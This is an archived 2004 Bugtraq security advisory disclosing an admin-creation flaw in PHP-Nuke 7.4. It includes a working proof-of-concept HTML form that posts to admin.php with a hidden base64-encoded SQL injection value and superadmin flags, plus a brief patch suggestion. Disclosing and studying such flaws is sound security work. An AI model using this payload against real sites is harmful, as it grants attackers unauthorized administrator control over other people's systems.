| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 3 Sep 2004 12:50:59 -0000
From: Pierquinto Manco <mantra@....it>
To: bugtraq@...urityfocus.com
Subject: [XSS] PHP-Nuke 7.4 Remote Privilege Escalation
**************************************************************
* CODEBUG Labs
* Advisory #1
* Title: AddAdmin Bug
* Author: Pierquinto 'Mantra' Manco
* Product: PHP-Nuke 7.4
* Type: XSS
* Web: http://www.mantralab.org [ITALIAN SITE]
*
**************************************************************
Remote Privilege Escalation
- ) Description
PHP-Nuke is a very bugged web CMS, version 7.4 has critical
XSS bug that permit to an attacker to gain Admin access
to the system.
The bug is very old but we can bypass the patch sending data
by POST instead of GET.
- ) Proof-of-Concept
Create a HTML file with this lines:
<form name="mantra" method="POST" action="http://www.sitewithphpnuke.com/admin.php">
<p>USERNAME:
<input type="text" name="add_aid">
<br>
NOME:
<input type="text" name="add_name">
<br>
PASSWORD:
<input type="text" name="add_pwd">
<br>
E-MAIL:
<input type="text" name="add_email">
<br>
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<br>
<input type="hidden" name="add_radminsuper" value="1">
<br>
<input type="hidden" name="op" value="AddAuthor">
</p>
<p>
<input type="submit" name="Submit" value="Create Admin">
<br>
</p>
</form>
- ) Patch
Put in admin.php a routine to check GET and POST global array.
(maybe COOKIE too)
**************************************************************
http://www.mantralab.org
admin@...tralab.org
**************************************************************
Powered by blists - more mailing lists